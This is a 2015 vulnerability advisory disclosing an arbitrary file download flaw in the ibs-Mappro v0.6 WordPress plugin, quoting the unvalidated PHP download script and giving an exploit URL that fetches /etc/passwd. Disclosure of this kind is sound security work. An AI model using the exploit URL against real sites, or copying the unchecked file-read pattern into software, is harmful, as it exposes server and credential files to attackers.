Remote file download vulnerability in ibs-Mappro v0.6 Wordpress plugin

["Larry W. Cashdollar" <larry0 () me com>]

Title: Remote file download vulnerability in ibs-Mappro v0.6 Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-08
Download Site: https://wordpress.org/plugins/ibs-mappro/
Vendor: Hmoore71
Vendor Notified: 2015-07-08, resolved in v1.0.
Vendor Contact: Contacted via webform
Advisory: http://www.vapid.dhs.org/advisory.php?v=137
Description: IBS Mappro is a comprehensive map creator, editor, and view generator based on the Google Maps API v3 and 
supports kml, kmz, and gpx map files.
Vulnerability:
the download.php script allows any remote user to download files off of the server:
if (isset($_GET)) {
    $filename = $_GET['file'];
    $info = pathinfo($filename);
    $name = $info['basename'];
    if (file_exists($filename)) {
        header('Set-Cookie: fileDownload=true; path=/');
        header('Cache-Control: max-age=60, must-revalidate');
        header('Content-Disposition: attachment; filename="' . $title . '-' . $timestamp . '.csv"');
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . $name . '"');
        header('Content-Transfer-Encoding: binary');
        header('Expires: 0');
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Pragma: public');
        header('Content-Length: ' . filesize($filename));
        ob_clean();
        flush();
        readfile($filename);
        exit;
    } else {
        die;
    }
} else {
    die;
}
?>
 
CVEID: Please assign.
OSVDB: TDB
Exploit Code:
        • http://example.com/wp-content/plugins/ibs-mappro/lib/download.php?file=/etc/passwd